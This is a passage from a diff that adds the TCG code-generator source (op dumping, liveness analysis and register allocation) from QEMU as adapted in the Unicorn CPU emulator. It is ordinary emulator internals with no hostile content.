TCGv_i64 arg) +{ + return tcg_get_arg_str_idx(s, buf, buf_size, GET_TCGV_I64(arg)); +} + +/* Find helper name. */ +static inline const char *tcg_find_helper(TCGContext *s, uintptr_t val) +{ + const char *ret = NULL; + if (s->helpers) { + TCGHelperInfo *info = g_hash_table_lookup(s->helpers, (gpointer)val); + if (info) { + ret = info->name; + } + } + return ret; +} + +static const char * const cond_name[] = +{ +#ifdef _MSC_VER + "never", // TCG_COND_NEVER + "always", // TCG_COND_ALWAYS + "lt", // TCG_COND_LT + "ge", // TCG_COND_GE + "ltu", // TCG_COND_LTU + "geu", // TCG_COND_GEU + NULL, // n/a + NULL, // n/a + "eq", // TCG_COND_EQ + "ne", // TCG_COND_NE + "le", // TCG_COND_LE + "gt", // TCG_COND_GT + "leu", // TCG_COND_LEU + "gtu", // TCG_COND_GTU + NULL, // n/a + NULL, // n/a +#else + [TCG_COND_NEVER] = "never", + [TCG_COND_ALWAYS] = "always", + [TCG_COND_EQ] = "eq", + [TCG_COND_NE] = "ne", + [TCG_COND_LT] = "lt", + [TCG_COND_GE] = "ge", + [TCG_COND_LE] = "le", + [TCG_COND_GT] = "gt", + [TCG_COND_LTU] = "ltu", + [TCG_COND_GEU] = "geu", + [TCG_COND_LEU] = "leu", + [TCG_COND_GTU] = "gtu" +#endif +}; + +static const char * const ldst_name[] = +{ +#ifdef _MSC_VER + "ub", // MO_UB +# ifdef HOST_WORDS_BIGENDIAN + "beuw", // MO_BEUW + "beul", // MO_BEUL + "beq", // MO_BEQ + "sb", // MO_SB + "besw", // MO_BESW + "besl", // MO_BESL + NULL, // n/a + NULL, // n/a + "leuw", // MO_LEUW + "leul", // MO_LEUL + "leq", // MO_LEQ + NULL, // n/a + "lesw", // MO_LESW + "lesl", // MO_LESL + NULL, // n/a +# else // !HOST_WORDS_BIGENDIAN + "leuw", // MO_LEUW + "leul", // MO_LEUL + "leq", // MO_LEQ + "sb", // MO_SB + "lesw", // MO_LESW + "lesl", // MO_LESL + NULL, // n/a + NULL, // n/a + "beuw", // MO_BEUW + "beul", // MO_BEUL + "beq", // MO_BEQ + NULL, // n/a + "besw", // MO_BESW + "besl", // MO_BESL + NULL, // n/a +# endif // HOST_WORDS_BIGENDIAN + +#else //_MSC_VER + [MO_UB] = "ub", + [MO_SB] = "sb", + [MO_LEUW] = "leuw", + [MO_LESW] = "lesw", + [MO_LEUL] = "leul", + [MO_LESL] = "lesl", + [MO_LEQ] = "leq", + [MO_BEUW] = "beuw", + [MO_BESW] = "besw", + [MO_BEUL] = "beul", + [MO_BESL] = "besl", + [MO_BEQ] = "beq", +#endif // _MSC_VER +}; + +void tcg_dump_ops(TCGContext *s) +{ + const uint16_t *opc_ptr; + const TCGArg *args; + TCGArg arg; + TCGOpcode c; + int i, k, nb_oargs, nb_iargs, nb_cargs, first_insn; + const TCGOpDef *def; + char buf[128]; + + first_insn = 1; + opc_ptr = s->gen_opc_buf; + args = s->gen_opparam_buf; + while (opc_ptr < s->gen_opc_ptr) { + c = *opc_ptr++; + def = &s->tcg_op_defs[c]; + if (c == INDEX_op_debug_insn_start) { + uint64_t pc; +#if TARGET_LONG_BITS > TCG_TARGET_REG_BITS + pc = ((uint64_t)args[1] << 32) | args[0]; +#else + pc = args[0]; +#endif + if (!first_insn) { + printf("\n"); + } + printf(" ---- 0x%" PRIx64, pc); + first_insn = 0; + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + nb_cargs = def->nb_cargs; + } else if (c == INDEX_op_call) { + TCGArg arg; + + /* variable number of arguments */ + arg = *args++; + nb_oargs = arg >> 16; + nb_iargs = arg & 0xffff; + nb_cargs = def->nb_cargs; + + /* function name, flags, out args */ + printf(" %s %s,$0x%" TCG_PRIlx ",$%d", def->name, + tcg_find_helper(s, args[nb_oargs + nb_iargs]), + args[nb_oargs + nb_iargs + 1], nb_oargs); + for (i = 0; i < nb_oargs; i++) { + printf(",%s", tcg_get_arg_str_idx(s, buf, sizeof(buf), + args[i])); + } + for (i = 0; i < nb_iargs; i++) { + TCGArg arg = args[nb_oargs + i]; + const char *t = ""; + if (arg != TCG_CALL_DUMMY_ARG) { + t = tcg_get_arg_str_idx(s, buf, sizeof(buf), arg); + } + printf(",%s", t); + } + } else { + printf(" %s ", def->name); + if (c == INDEX_op_nopn) { + /* variable number of arguments */ + nb_cargs = *args; + nb_oargs = 0; + nb_iargs = 0; + } else { + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + nb_cargs = def->nb_cargs; + } + + k = 0; + for(i = 0; i < nb_oargs; i++) { + if (k != 0) { + printf(","); + } + printf("%s", tcg_get_arg_str_idx(s, buf, sizeof(buf), + args[k++])); + } + for(i = 0; i < nb_iargs; i++) { + if (k != 0) { + printf(","); + } + printf("%s", tcg_get_arg_str_idx(s, buf, sizeof(buf), + args[k++])); + } + switch (c) { + case INDEX_op_brcond_i32: + case INDEX_op_setcond_i32: + case INDEX_op_movcond_i32: + case INDEX_op_brcond2_i32: + case INDEX_op_setcond2_i32: + case INDEX_op_brcond_i64: + case INDEX_op_setcond_i64: + case INDEX_op_movcond_i64: + if (args[k] < ARRAY_SIZE(cond_name) && cond_name[args[k]]) { + printf(",%s", cond_name[args[k++]]); + } else { + printf(",$0x%" TCG_PRIlx, args[k++]); + } + i = 1; + break; + case INDEX_op_qemu_ld_i32: + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_ld_i64: + case INDEX_op_qemu_st_i64: + if (args[k] < ARRAY_SIZE(ldst_name) && ldst_name[args[k]]) { + printf(",%s", ldst_name[args[k++]]); + } else { + printf(",$0x%" TCG_PRIlx, args[k++]); + } + i = 1; + break; + default: + i = 0; + break; + } + for(; i < nb_cargs; i++) { + if (k != 0) { + printf(","); + } + arg = args[k++]; + printf("$0x%" TCG_PRIlx, arg); + } + } + printf("\n"); + args += nb_iargs + nb_oargs + nb_cargs; + } + printf("###########\n"); +} + +/* we give more priority to constraints with less registers */ +static int get_constraint_priority(const TCGOpDef *def, int k) +{ + const TCGArgConstraint *arg_ct; + + int i, n; + arg_ct = &def->args_ct[k]; + if (arg_ct->ct & TCG_CT_ALIAS) { + /* an alias is equivalent to a single register */ + n = 1; + } else { + if (!(arg_ct->ct & TCG_CT_REG)) + return 0; + n = 0; + for(i = 0; i < TCG_TARGET_NB_REGS; i++) { + if (tcg_regset_test_reg(arg_ct->u.regs, i)) + n++; + } + } + return TCG_TARGET_NB_REGS - n + 1; +} + +/* sort from highest priority to lowest */ +static void sort_constraints(TCGOpDef *def, int start, int n) +{ + int i, j, p1, p2, tmp; + + for(i = 0; i < n; i++) + def->sorted_args[start + i] = start + i; + if (n <= 1) + return; + for(i = 0; i < n - 1; i++) { + for(j = i + 1; j < n; j++) { + p1 = get_constraint_priority(def, def->sorted_args[start + i]); + p2 = get_constraint_priority(def, def->sorted_args[start + j]); + if (p1 < p2) { + tmp = def->sorted_args[start + i]; + def->sorted_args[start + i] = def->sorted_args[start + j]; + def->sorted_args[start + j] = tmp; + } + } + } +} + +void tcg_add_target_add_op_defs(TCGContext *s, const TCGTargetOpDef *tdefs) +{ + TCGOpcode op; + TCGOpDef *def; + const char *ct_str; + int i, nb_args; + + for(;;) { + if (tdefs->op == (TCGOpcode)-1) + break; + op = tdefs->op; + assert((unsigned)op < NB_OPS); + def = &s->tcg_op_defs[op]; +#if defined(CONFIG_DEBUG_TCG) + /* Duplicate entry in op definitions? */ + assert(!def->used); + def->used = 1; +#endif + nb_args = def->nb_iargs + def->nb_oargs; + for(i = 0; i < nb_args; i++) { + ct_str = tdefs->args_ct_str[i]; + /* Incomplete TCGTargetOpDef entry? */ + assert(ct_str != NULL); + tcg_regset_clear(def->args_ct[i].u.regs); + def->args_ct[i].ct = 0; + if (ct_str[0] >= '0' && ct_str[0] <= '9') { + int oarg; + oarg = ct_str[0] - '0'; + assert(oarg < def->nb_oargs); + assert(def->args_ct[oarg].ct & TCG_CT_REG); + /* TCG_CT_ALIAS is for the output arguments. The input + argument is tagged with TCG_CT_IALIAS. */ + def->args_ct[i] = def->args_ct[oarg]; + def->args_ct[oarg].ct = TCG_CT_ALIAS; + def->args_ct[oarg].alias_index = i; + def->args_ct[i].ct |= TCG_CT_IALIAS; + def->args_ct[i].alias_index = oarg; + } else { + for(;;) { + if (*ct_str == '\0') + break; + switch(*ct_str) { + case 'i': + def->args_ct[i].ct |= TCG_CT_CONST; + ct_str++; + break; + default: + if (target_parse_constraint(&def->args_ct[i], &ct_str) < 0) { + fprintf(stderr, "Invalid constraint '%s' for arg %d of operation '%s'\n", + ct_str, i, def->name); + exit(1); + } + } + } + } + } + + /* TCGTargetOpDef entry with too much information? */ + assert(i == TCG_MAX_OP_ARGS || tdefs->args_ct_str[i] == NULL); + + /* sort the constraints (XXX: this is just an heuristic) */ + sort_constraints(def, 0, def->nb_oargs); + sort_constraints(def, def->nb_oargs, def->nb_iargs); + +#if 0 + { + int i; + + printf("%s: sorted=", def->name); + for(i = 0; i < def->nb_oargs + def->nb_iargs; i++) + printf(" %d", def->sorted_args[i]); + printf("\n"); + } +#endif + tdefs++; + } + +#if defined(CONFIG_DEBUG_TCG) + i = 0; + for (op = 0; op < ARRAY_SIZE(s->tcg_op_defs); op++) { + const TCGOpDef *def = &s->tcg_op_defs[op]; + if (def->flags & TCG_OPF_NOT_PRESENT) { + /* Wrong entry in op definitions? */ + if (def->used) { + fprintf(stderr, "Invalid op definition for %s\n", def->name); + i = 1; + } + } else { + /* Missing entry in op definitions? */ + if (!def->used) { + fprintf(stderr, "Missing op definition for %s\n", def->name); + i = 1; + } + } + } + if (i == 1) { + tcg_abort(); + } +#endif +} + +#ifdef USE_LIVENESS_ANALYSIS + +/* set a nop for an operation using 'nb_args' */ +static inline void tcg_set_nop(TCGContext *s, uint16_t *opc_ptr, + TCGArg *args, int nb_args) +{ + if (nb_args == 0) { + *opc_ptr = INDEX_op_nop; + } else { + *opc_ptr = INDEX_op_nopn; + args[0] = nb_args; + args[nb_args - 1] = nb_args; + } +} + +/* liveness analysis: end of function: all temps are dead, and globals + should be in memory. */ +static inline void tcg_la_func_end(TCGContext *s, uint8_t *dead_temps, + uint8_t *mem_temps) +{ + memset(dead_temps, 1, s->nb_temps); + memset(mem_temps, 1, s->nb_globals); + memset(mem_temps + s->nb_globals, 0, s->nb_temps - s->nb_globals); +} + +/* liveness analysis: end of basic block: all temps are dead, globals + and local temps should be in memory. */ +static inline void tcg_la_bb_end(TCGContext *s, uint8_t *dead_temps, + uint8_t *mem_temps) +{ + int i; + + memset(dead_temps, 1, s->nb_temps); + memset(mem_temps, 1, s->nb_globals); + for(i = s->nb_globals; i < s->nb_temps; i++) { + mem_temps[i] = s->temps[i].temp_local; + } +} + +/* + Unicorn: for brcond, we should refresh liveness states for TCG globals +*/ +static inline void tcg_la_br_end(TCGContext *s, uint8_t *mem_temps) +{ + int i; + memset(mem_temps, 1, s->nb_globals); + for(i = s->nb_globals; i < s->nb_temps; i++) { + mem_temps[i] = s->temps[i].temp_local; + } +} + +/* Liveness analysis : update the opc_dead_args array to tell if a + given input arguments is dead. Instructions updating dead + temporaries are removed. */ +static void tcg_liveness_analysis(TCGContext *s) +{ + int i, op_index, nb_args, nb_iargs, nb_oargs, nb_ops; + TCGOpcode op, op_new, op_new2; + TCGArg *args, arg; + const TCGOpDef *def; + uint8_t *dead_temps, *mem_temps; + uint16_t dead_args; + uint8_t sync_args; + bool have_op_new2; + + s->gen_opc_ptr++; /* skip end */ + + nb_ops = s->gen_opc_ptr - s->gen_opc_buf; + + s->op_dead_args = tcg_malloc(s, nb_ops * sizeof(uint16_t)); + s->op_sync_args = tcg_malloc(s, nb_ops * sizeof(uint8_t)); + + dead_temps = tcg_malloc(s, s->nb_temps); + mem_temps = tcg_malloc(s, s->nb_temps); + tcg_la_func_end(s, dead_temps, mem_temps); + + args = s->gen_opparam_ptr; + op_index = nb_ops - 1; + while (op_index >= 0) { + op = s->gen_opc_buf[op_index]; + def = &s->tcg_op_defs[op]; + switch(op) { + case INDEX_op_call: + { + int call_flags; + + nb_args = args[-1]; + args -= nb_args; + arg = *args++; + nb_iargs = arg & 0xffff; + nb_oargs = arg >> 16; + call_flags = args[nb_oargs + nb_iargs + 1]; + + /* pure functions can be removed if their result is not + used */ + if (call_flags & TCG_CALL_NO_SIDE_EFFECTS) { + for (i = 0; i < nb_oargs; i++) { + arg = args[i]; + if (!dead_temps[arg] || mem_temps[arg]) { + goto do_not_remove_call; + } + } + tcg_set_nop(s, s->gen_opc_buf + op_index, + args - 1, nb_args); + } else { + do_not_remove_call: + + /* output args are dead */ + dead_args = 0; + sync_args = 0; + for (i = 0; i < nb_oargs; i++) { + arg = args[i]; + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + if (mem_temps[arg]) { + sync_args |= (1 << i); + } + dead_temps[arg] = 1; + mem_temps[arg] = 0; + } + + if (!(call_flags & TCG_CALL_NO_READ_GLOBALS)) { + /* globals should be synced to memory */ + memset(mem_temps, 1, s->nb_globals); + } + if (!(call_flags & (TCG_CALL_NO_WRITE_GLOBALS | + TCG_CALL_NO_READ_GLOBALS))) { + /* globals should go back to memory */ + memset(dead_temps, 1, s->nb_globals); + } + + /* input args are live */ + for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { + arg = args[i]; + if (arg != TCG_CALL_DUMMY_ARG) { + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + dead_temps[arg] = 0; + } + } + s->op_dead_args[op_index] = dead_args; + s->op_sync_args[op_index] = sync_args; + } + args--; + } + break; + case INDEX_op_debug_insn_start: + args -= def->nb_args; + break; + case INDEX_op_nopn: + nb_args = args[-1]; + args -= nb_args; + break; + case INDEX_op_discard: + args--; + /* mark the temporary as dead */ + dead_temps[args[0]] = 1; + mem_temps[args[0]] = 0; + break; + case INDEX_op_end: + break; + + case INDEX_op_add2_i32: + op_new = INDEX_op_add_i32; + goto do_addsub2; + case INDEX_op_sub2_i32: + op_new = INDEX_op_sub_i32; + goto do_addsub2; + case INDEX_op_add2_i64: + op_new = INDEX_op_add_i64; + goto do_addsub2; + case INDEX_op_sub2_i64: + op_new = INDEX_op_sub_i64; + do_addsub2: + args -= 6; + nb_iargs = 4; + nb_oargs = 2; + /* Test if the high part of the operation is dead, but not + the low part. The result can be optimized to a simple + add or sub. This happens often for x86_64 guest when the + cpu mode is set to 32 bit. */ + if (dead_temps[args[1]] && !mem_temps[args[1]]) { + if (dead_temps[args[0]] && !mem_temps[args[0]]) { + goto do_remove; + } + /* Create the single operation plus nop. */ + s->gen_opc_buf[op_index] = op = op_new; + args[1] = args[2]; + args[2] = args[4]; + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + tcg_set_nop(s, s->gen_opc_buf + op_index + 1, args + 3, 3); + /* Fall through and mark the single-word operation live. */ + nb_iargs = 2; + nb_oargs = 1; + } + goto do_not_remove; + + case INDEX_op_mulu2_i32: + op_new = INDEX_op_mul_i32; + op_new2 = INDEX_op_muluh_i32; + have_op_new2 = TCG_TARGET_HAS_muluh_i32; + goto do_mul2; + case INDEX_op_muls2_i32: + op_new = INDEX_op_mul_i32; + op_new2 = INDEX_op_mulsh_i32; + have_op_new2 = TCG_TARGET_HAS_mulsh_i32; + goto do_mul2; + case INDEX_op_mulu2_i64: + op_new = INDEX_op_mul_i64; + op_new2 = INDEX_op_muluh_i64; + have_op_new2 = TCG_TARGET_HAS_muluh_i64; + goto do_mul2; + case INDEX_op_muls2_i64: + op_new = INDEX_op_mul_i64; + op_new2 = INDEX_op_mulsh_i64; + have_op_new2 = TCG_TARGET_HAS_mulsh_i64; + goto do_mul2; + do_mul2: + args -= 4; + nb_iargs = 2; + nb_oargs = 2; + if (dead_temps[args[1]] && !mem_temps[args[1]]) { + if (dead_temps[args[0]] && !mem_temps[args[0]]) { + /* Both parts of the operation are dead. */ + goto do_remove; + } + /* The high part of the operation is dead; generate the low. */ + s->gen_opc_buf[op_index] = op = op_new; + args[1] = args[2]; + args[2] = args[3]; + } else if (have_op_new2 && dead_temps[args[0]] + && !mem_temps[args[0]]) { + /* The low part of the operation is dead; generate the high. */ + s->gen_opc_buf[op_index] = op = op_new2; + args[0] = args[1]; + args[1] = args[2]; + args[2] = args[3]; + } else { + goto do_not_remove; + } + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + tcg_set_nop(s, s->gen_opc_buf + op_index + 1, args + 3, 1); + /* Mark the single-word operation live. */ + nb_oargs = 1; + goto do_not_remove; + + default: + /* XXX: optimize by hardcoding common cases (e.g. triadic ops) */ + args -= def->nb_args; + nb_iargs = def->nb_iargs; + nb_oargs = def->nb_oargs; + + /* Test if the operation can be removed because all + its outputs are dead. We assume that nb_oargs == 0 + implies side effects */ + if (!(def->flags & TCG_OPF_SIDE_EFFECTS) && nb_oargs != 0) { + for(i = 0; i < nb_oargs; i++) { + if (args[i] >= TCG_MAX_TEMPS) { + continue; + } + arg = args[i]; + if (!dead_temps[arg] || mem_temps[arg]) { + goto do_not_remove; + } + } + do_remove: + tcg_set_nop(s, s->gen_opc_buf + op_index, args, def->nb_args); +#ifdef CONFIG_PROFILER + s->del_op_count++; +#endif + } else { + do_not_remove: + + /* output args are dead */ + dead_args = 0; + sync_args = 0; + for(i = 0; i < nb_oargs; i++) { + arg = args[i]; + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + if (mem_temps[arg]) { + sync_args |= (1 << i); + } + dead_temps[arg] = 1; + mem_temps[arg] = 0; + } + + /* if end of basic block, update */ + if (def->flags & TCG_OPF_BB_END) { + // Unicorn: do not optimize dead temps on brcond, + // this causes problem because check_exit_request() inserts + // brcond instruction in the middle of the TB, + // which incorrectly flags end-of-block + if (op != INDEX_op_brcond_i32) + tcg_la_bb_end(s, dead_temps, mem_temps); + // Unicorn: we do not touch dead temps for brcond, + // but we should refresh TCG globals In-Memory states, + // otherwise, important CPU states(especially conditional flags) might be forgotten, + // result in wrongly generated host code that run into wrong branch. + // Refer to https://github.com/unicorn-engine/unicorn/issues/287 for further information + else + tcg_la_br_end(s, mem_temps); + } else if (def->flags & TCG_OPF_SIDE_EFFECTS) { + /* globals should be synced to memory */ + memset(mem_temps, 1, s->nb_globals); + } + + /* input args are live */ + for(i = nb_oargs; i < nb_oargs + nb_iargs; i++) { + arg = args[i]; + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + dead_temps[arg] = 0; + } + s->op_dead_args[op_index] = dead_args; + s->op_sync_args[op_index] = sync_args; + } + break; + } + op_index--; + } + + if (args != s->gen_opparam_buf) { + tcg_abort(); + } +} +#else +/* dummy liveness analysis */ +static void tcg_liveness_analysis(TCGContext *s) +{ + int nb_ops; + nb_ops = s->gen_opc_ptr - s->gen_opc_buf; + + s->op_dead_args = tcg_malloc(s, nb_ops * sizeof(uint16_t)); + memset(s->op_dead_args, 0, nb_ops * sizeof(uint16_t)); + s->op_sync_args = tcg_malloc(s, nb_ops * sizeof(uint8_t)); + memset(s->op_sync_args, 0, nb_ops * sizeof(uint8_t)); +} +#endif + +#ifndef NDEBUG +static void dump_regs(TCGContext *s) +{ + TCGTemp *ts; + int i; + char buf[64]; + + for(i = 0; i < s->nb_temps; i++) { + ts = &s->temps[i]; + printf(" %10s: ", tcg_get_arg_str_idx(s, buf, sizeof(buf), i)); + switch(ts->val_type) { + case TEMP_VAL_REG: + printf("%s", tcg_target_reg_names[ts->reg]); + break; + case TEMP_VAL_MEM: + printf("%d(%s)", (int)ts->mem_offset, tcg_target_reg_names[ts->mem_reg]); + break; + case TEMP_VAL_CONST: + printf("$0x%" TCG_PRIlx, ts->val); + break; + case TEMP_VAL_DEAD: + printf("D"); + break; + default: + printf("???"); + break; + } + printf("\n"); + } + + for(i = 0; i < TCG_TARGET_NB_REGS; i++) { + if (s->reg_to_temp[i] >= 0) { + printf("%s: %s\n", + tcg_target_reg_names[i], + tcg_get_arg_str_idx(s, buf, sizeof(buf), s->reg_to_temp[i])); + } + } +} + +static void check_regs(TCGContext *s) +{ + int reg, k; + TCGTemp *ts; + char buf[64]; + + for(reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { + k = s->reg_to_temp[reg]; + if (k >= 0) { + ts = &s->temps[k]; + if (ts->val_type != TEMP_VAL_REG || + ts->reg != reg) { + printf("Inconsistency for register %s:\n", + tcg_target_reg_names[reg]); + goto fail; + } + } + } + for(k = 0; k < s->nb_temps; k++) { + ts = &s->temps[k]; + if (ts->val_type == TEMP_VAL_REG && + !ts->fixed_reg && + s->reg_to_temp[ts->reg] != k) { + printf("Inconsistency for temp %s:\n", + tcg_get_arg_str_idx(s, buf, sizeof(buf), k)); + fail: + printf("reg state:\n"); + dump_regs(s); + tcg_abort(); + } + } +} +#endif + +static void temp_allocate_frame(TCGContext *s, int temp) +{ + TCGTemp *ts; + ts = &s->temps[temp]; +#if !(defined(__sparc__) && TCG_TARGET_REG_BITS == 64) + /* Sparc64 stack is accessed with offset of 2047 */ + s->current_frame_offset = (s->current_frame_offset + + (tcg_target_long)sizeof(tcg_target_long) - 1) & + ~(sizeof(tcg_target_long) - 1); +#endif + if (s->current_frame_offset + (tcg_target_long)sizeof(tcg_target_long) > + s->frame_end) { + tcg_abort(); + } + ts->mem_offset = s->current_frame_offset; + ts->mem_reg = s->frame_reg; + ts->mem_allocated = 1; + s->current_frame_offset += sizeof(tcg_target_long); +} + +/* sync register 'reg' by saving it to the corresponding temporary */ +static inline void tcg_reg_sync(TCGContext *s, int reg) +{ + TCGTemp *ts; + int temp; + + temp = s->reg_to_temp[reg]; + ts = &s->temps[temp]; + assert(ts->val_type == TEMP_VAL_REG); + if (!ts->mem_coherent && !ts->fixed_reg) { + if (!ts->mem_allocated) { + temp_allocate_frame(s, temp); + } + tcg_out_st(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + } + ts->mem_coherent = 1; +} + +/* free register 'reg' by spilling the corresponding temporary if necessary */ +static void tcg_reg_free(TCGContext *s, int reg) +{ + int temp; + + temp = s->reg_to_temp[reg]; + if (temp != -1) { + tcg_reg_sync(s, reg); + s->temps[temp].val_type = TEMP_VAL_MEM; + s->reg_to_temp[reg] = -1; + } +} + +/* Allocate a register belonging to reg1 & ~reg2 */ +static int tcg_reg_alloc(TCGContext *s, TCGRegSet reg1, TCGRegSet reg2) +{ + int i, reg; + TCGRegSet reg_ct; + + tcg_regset_andnot(reg_ct, reg1, reg2); + + /* first try free registers */ + for(i = 0; i < ARRAY_SIZE(tcg_target_reg_alloc_order); i++) { + reg = tcg_target_reg_alloc_order[i]; + if (tcg_regset_test_reg(reg_ct, reg) && s->reg_to_temp[reg] == -1) + return reg; + } + + /* XXX: do better spill choice */ + for(i = 0; i < ARRAY_SIZE(tcg_target_reg_alloc_order); i++) { + reg = tcg_target_reg_alloc_order[i]; + if (tcg_regset_test_reg(reg_ct, reg)) { + tcg_reg_free(s, reg); + return reg; + } + } + + tcg_abort(); +} + +/* mark a temporary as dead. */ +static inline void temp_dead(TCGContext *s, int temp) +{ + TCGTemp *ts; + + ts = &s->temps[temp]; + if (!ts->fixed_reg) { + if (ts->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ts->reg] = -1; + } + if (temp < s->nb_globals || ts->temp_local) { + ts->val_type = TEMP_VAL_MEM; + } else { + ts->val_type = TEMP_VAL_DEAD; + } + } +} + +/* sync a temporary to memory. 'allocated_regs' is used in case a + temporary registers needs to be allocated to store a constant. */ +static inline void temp_sync(TCGContext *s, int temp, TCGRegSet allocated_regs) +{ + TCGTemp *ts; + + ts = &s->temps[temp]; + if (!ts->fixed_reg) { + switch(ts->val_type) { + case TEMP_VAL_CONST: + ts->reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[ts->type], + allocated_regs); + ts->val_type = TEMP_VAL_REG; + s->reg_to_temp[ts->reg] = temp; + ts->mem_coherent = 0; + tcg_out_movi(s, ts->type, ts->reg, ts->val); + /* fallthrough*/ + case TEMP_VAL_REG: + tcg_reg_sync(s, ts->reg); + break; + case TEMP_VAL_DEAD: + case TEMP_VAL_MEM: + break; + default: + tcg_abort(); + } + } +} + +/* save a temporary to memory. 'allocated_regs' is used in case a + temporary registers needs to be allocated to store a constant. */ +static inline void temp_save(TCGContext *s, int temp, TCGRegSet allocated_regs) +{ +#ifdef USE_LIVENESS_ANALYSIS + /* The liveness analysis already ensures that globals are back + in memory. Keep an assert for safety. */ + assert(s->temps[temp].val_type == TEMP_VAL_MEM || s->temps[temp].fixed_reg); +#else + temp_sync(s, temp, allocated_regs); + temp_dead(s, temp); +#endif +} + +/* save globals to their canonical location and assume they can be + modified be the following code. 'allocated_regs' is used in case a + temporary registers needs to be allocated to store a constant. */ +static void save_globals(TCGContext *s, TCGRegSet allocated_regs) +{ + int i; + + for(i = 0; i < s->nb_globals; i++) { + temp_save(s, i, allocated_regs); + } +} + +/* sync globals to their canonical location and assume they can be + read by the following code. 'allocated_regs' is used in case a + temporary registers needs to be allocated to store a constant. */ +static void sync_globals(TCGContext *s, TCGRegSet allocated_regs) +{ + int i; + + for (i = 0; i < s->nb_globals; i++) { +#ifdef USE_LIVENESS_ANALYSIS + assert(s->temps[i].val_type != TEMP_VAL_REG || s->temps[i].fixed_reg || + s->temps[i].mem_coherent); +#else + temp_sync(s, i, allocated_regs); +#endif + } +} + +/* at the end of a basic block, we assume all temporaries are dead and + all globals are stored at their canonical location. */ +static void tcg_reg_alloc_bb_end(TCGContext *s, TCGRegSet allocated_regs) +{ + TCGTemp *ts; + int i; + + for(i = s->nb_globals; i < s->nb_temps; i++) { + ts = &s->temps[i]; + if (ts->temp_local) { + temp_save(s, i, allocated_regs); + } else { +#ifdef USE_LIVENESS_ANALYSIS + /* The liveness analysis already ensures that temps are dead. + Keep an assert for safety. */ + assert(ts->val_type == TEMP_VAL_DEAD); +#else + temp_dead(s, i); +#endif + } + } + + save_globals(s, allocated_regs); +} + +#define IS_DEAD_ARG(n) ((dead_args >> (n)) & 1) +#define NEED_SYNC_ARG(n) ((sync_args >> (n)) & 1) + +static void tcg_reg_alloc_movi(TCGContext *s, const TCGArg *args, + uint16_t dead_args, uint8_t sync_args) +{ + TCGTemp *ots; + tcg_target_ulong val; + + ots = &s->temps[args[0]]; + val = args[1]; + + if (ots->fixed_reg) { + /* for fixed registers, we do not do any constant + propagation */ + tcg_out_movi(s, ots->type, ots->reg, val); + } else { + /* The movi is not explicitly generated here */ + if (ots->val_type == TEMP_VAL_REG) + s->reg_to_temp[ots->reg] = -1; + ots->val_type = TEMP_VAL_CONST; + ots->val = val; + } + if (NEED_SYNC_ARG(0)) { + temp_sync(s, args[0], s->reserved_regs); + } + if (IS_DEAD_ARG(0)) { + temp_dead(s, args[0]); + } +} + +static void tcg_reg_alloc_mov(TCGContext *s, const TCGOpDef *def, + const TCGArg *args, uint16_t dead_args, + uint8_t sync_args) +{ + TCGRegSet allocated_regs; + TCGTemp *ts, *ots; + TCGType otype, itype; + + tcg_regset_set(allocated_regs, s->reserved_regs); + ots = &s->temps[args[0]]; + ts = &s->temps[args[1]]; + + /* Note that otype != itype for no-op truncation. */ + otype = ots->type; + itype = ts->type; + + /* If the source value is not in a register, and we're going to be + forced to have it in a register in order to perform the copy, + then copy the SOURCE value into its own register first. That way + we don't have to reload SOURCE the next time it is used. */ + if (((NEED_SYNC_ARG(0) || ots->fixed_reg) && ts->val_type != TEMP_VAL_REG) + || ts->val_type == TEMP_VAL_MEM) { + ts->reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[itype], + allocated_regs); + if (ts->val_type == TEMP_VAL_MEM) { + tcg_out_ld(s, itype, ts->reg, ts->mem_reg, ts->mem_offset); + ts->mem_coherent = 1; + } else if (ts->val_type == TEMP_VAL_CONST) { + tcg_out_movi(s, itype, ts->reg, ts->val); + ts->mem_coherent = 0; + } + s->reg_to_temp[ts->reg] = args[1]; + ts->val_type = TEMP_VAL_REG; + } + + if (IS_DEAD_ARG(0) && !ots->fixed_reg) { + /* mov to a non-saved dead register makes no sense (even with + liveness analysis disabled). */ + assert(NEED_SYNC_ARG(0)); + /* The code above should have moved the temp to a register. */ + assert(ts->val_type == TEMP_VAL_REG); + if (!ots->mem_allocated) { + temp_allocate_frame(s, args[0]); + } + tcg_out_st(s, otype, ts->reg, ots->mem_reg, ots->mem_offset); + if (IS_DEAD_ARG(1)) { + temp_dead(s, args[1]); + } + temp_dead(s, args[0]); + } else if (ts->val_type == TEMP_VAL_CONST) { + /* propagate constant */ + if (ots->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ots->reg] = -1; + } + ots->val_type = TEMP_VAL_CONST; + ots->val = ts->val; + } else { + /* The code in the first if block should have moved the + temp to a register. */ + assert(ts->val_type == TEMP_VAL_REG); + if (IS_DEAD_ARG(1) && !ts->fixed_reg && !ots->fixed_reg) { + /* the mov can be suppressed */ + if (ots->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ots->reg] = -1; + } + ots->reg = ts->reg; + temp_dead(s, args[1]); + } else { + if (ots->val_type != TEMP_VAL_REG) { + /* When allocating a new register, make sure to not spill the + input one. */ + tcg_regset_set_reg(allocated_regs, ts->reg); + ots->reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[otype], + allocated_regs); + } + tcg_out_mov(s, otype, ots->reg, ts->reg); + } + ots->val_type = TEMP_VAL_REG; + ots->mem_coherent = 0; + s->reg_to_temp[ots->reg] = args[0]; + if (NEED_SYNC_ARG(0)) { + tcg_reg_sync(s, ots->reg); + } + } +} + +static void tcg_reg_alloc_op(TCGContext *s, + const TCGOpDef *def, TCGOpcode opc, + const TCGArg *args, uint16_t dead_args, + uint8_t sync_args) +{ + TCGRegSet allocated_regs; + int i, k, nb_iargs, nb_oargs, reg; + 